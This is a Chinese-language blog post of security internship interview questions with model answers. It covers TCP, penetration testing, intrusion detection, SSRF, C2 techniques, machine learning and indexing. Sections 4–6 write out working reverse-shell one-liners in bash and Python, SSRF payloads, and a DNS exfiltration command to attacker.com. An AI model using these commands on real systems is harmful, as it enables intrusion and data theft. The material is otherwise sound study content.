网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
某腾讯科恩实验室实习扩展 一面
一、TCP三次握手深度解析
二、渗透测试全流程与内网渗透技术
三、系统安全与入侵检测
四、漏洞利用与隐蔽通信
五、ATT&CK矩阵与C2隐蔽通信
六、Linux通配符与命令注入
七、机器学习与算法模型
八、文本处理与恶意样本分析
九、倒排索引与搜索优化
某腾讯科恩实验室实习扩展 一面
tcp 三次握手 渗透测试流程 SSRF漏洞原理 内网渗透大致流程 防守方有哪些入侵检测手段,有哪些痕迹可以被抓取 线程与进程得区别 进程与内存空间得区别 父子进程的介绍 孤儿进程与僵尸进程 Kill一个进程的时候,发送了哪些事情(父子进程的角度描述) 反弹shell的几种方式(https://www.revshells.com/) att&ck矩阵的类别,介绍其中的CC 到域名下拿到命令执行的结果-dns域名解析获取命令回显 linux命令通配符 SVM与KNN介绍 卷积神经网络介绍 莱温斯坦距离 倒排索引 恶意样本给出函数家族的md5,如何分类一、TCP三次握手深度解析
- 技术过程与状态流转
- 流程:客户端发送
SYN(序列号x)→ 服务端返回SYN-ACK(序列号y,确认号x+1)→ 客户端发送ACK(确认号y+1)完成连接。- 状态机:
- 客户端:
CLOSED → SYN_SENT → ESTABLISHED- 服务端:
LISTEN → SYN_RCVD → ESTABLISHED- 设计缺陷:SYN Flood攻击通过伪造大量半连接耗尽服务端资源,防御采用SYN Cookie动态生成合法序列号。
- 优化与扩展
- TFO(TCP Fast Open):允许在首次握手时携带数据,降低延迟(0-RTT)。
- MTU探测:动态调整最大传输单元避免分片,提升传输效率。
二、渗透测试全流程与内网渗透技术
标准渗透测试流程(5阶段)
阶段 核心任务与工具 信息收集 子域名爆破(Sublist3r)、指纹识别(Wappalyzer)、资产测绘(Shodan) 漏洞利用 Exploit开发(Metasploit)、流量分析(BurpSuite) 权限提升 本地提权(Dirty Pipe)、凭证窃取(Mimikatz) 横向移动 Pass-the-Hash、WMI远程执行(Impacket) 痕迹清除 日志擦除(clearev)、时间戳篡改(timestomp) 内网渗透关键路径
- 网络拓扑探测:
- ARP扫描(NetDiscover)、路由追踪(tracert)识别内网结构。
- 凭证中继攻击:
- SMB Relay攻击利用未签名的SMB协议劫持会话。
- 域渗透技术:
- Golden Ticket伪造Kerberos票据实现持久化。
三、系统安全与入侵检测
- 入侵检测手段(5类痕迹)
- 主机痕迹:
- 进程树异常(无父进程的孤儿进程)、文件隐藏(Alternate Data Stream)。
- 网络痕迹:
- 异常DNS请求(长域名、高频次)、非标准端口通信(如ICMP隧道)。
- 日志痕迹:
- 安全日志ID 4625(登录失败)、Sysmon事件ID 1(进程创建)。
- 进程与内存管理
- 进程 vs 线程:
维度 进程 线程 资源隔离 独立内存空间 共享进程内存 上下文切换 开销大(需切换页表) 开销小(仅寄存器/栈) - 僵尸进程处理:
- 父进程需调用
wait()回收子进程资源,否则残留进程描述符。
四、漏洞利用与隐蔽通信
- SSRF漏洞利用与防御
- 攻击场景:
- 读取本地文件(
file:///etc/passwd)、攻击内网Redis(dict://:6379)。- 绕过技巧:
- 利用IPv6封装(
[::127.0.0.1])、域名重解析(DNS Rebinding)。- 防御方案:
- 禁用非常用协议(如
gopher)、校验目标IP归属(禁止私有地址段)。- 反弹Shell技术演进
- 经典方式:
bashbash -i >& /dev/tcp/10.0.0.1/8080 0>&1 # Bash反向连接 python3 -c 'import socket,os,pty; s=socket.socket(); s.connect(("10.0.0.1",8080)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2); pty.spawn("/bin/sh")'- 隐蔽化改进:
- 使用HTTPS加密信道(
ncat --ssl)、ICMP隧道传输(icmpsh)。
五、ATT&CK矩阵与C2隐蔽通信
- ATT&CK中的命令与控制(CC)技术
- 通信协议:
- HTTP伪装(User-Agent随机化)、DNS隧道(TXT记录编码数据)。
- 防御绕过:
- 流量混淆(Base64+异或加密)、域前置技术(伪装合法域名)。
- 检测方案:
- 统计域名请求频率、分析证书合法性(如自签名证书)。
- DNS回显数据获取
- 技术原理:
- 将命令输出编码为子域名(
dig $(whoami).attacker.com)。- 工具实现:
- 使用
dnscat2建立C2通道,数据分片存储于多个DNS请求。
六、Linux通配符与命令注入
- 通配符高级用法
- 文件操作:
bashrm -rf {*.log,*.tmp} # 批量删除日志与临时文件- 命令注入利用:
- 通过
/usr/bin/zip的-T参数触发命令执行(需通配符展开)。
七、机器学习与算法模型
SVM与KNN对比
维度 SVM KNN 核心思想 最大化分类间隔(支持向量) 基于近邻投票(距离度量) 适用场景 高维小样本(如文本分类) 低维大数据(如推荐系统) 计算复杂度 训练慢(二次规划求解) 预测慢(需遍历所有样本) 卷积神经网络(CNN)核心设计
- 组件功能:
- 卷积层(局部特征提取)、池化层(降维抗过拟合)、全连接层(全局分类)。
- 优化技术:
- 残差连接(ResNet解决梯度消失)、注意力机制(提升关键特征权重)。
八、文本处理与恶意样本分析
- 莱文斯坦距离优化
- 动态规划压缩:仅保留前一行数据,空间复杂度从O(n²)降至O(n)。
- 应用场景:拼写纠错、DNA序列比对。
- 恶意样本分类技术
- 静态分析:
- 提取PE头特征(节区熵值、导入表敏感API)。
- 动态分析:
- 监控注册表操作(如
RegSetValue)、网络行为(C2域名生成模式)。- 家族聚类:
- 基于API调用序列的LSTM模型、函数调用图(FCG)相似度计算。
九、倒排索引与搜索优化
- 分布式构建方案
- MapReduce实现:
- Mapper生成
(term, docID)键值对,Reducer合并倒排列表。- 压缩算法:
- Delta编码(存储差值)+ Variable Byte编码(动态字节长度)。
)
介绍,附pdf)
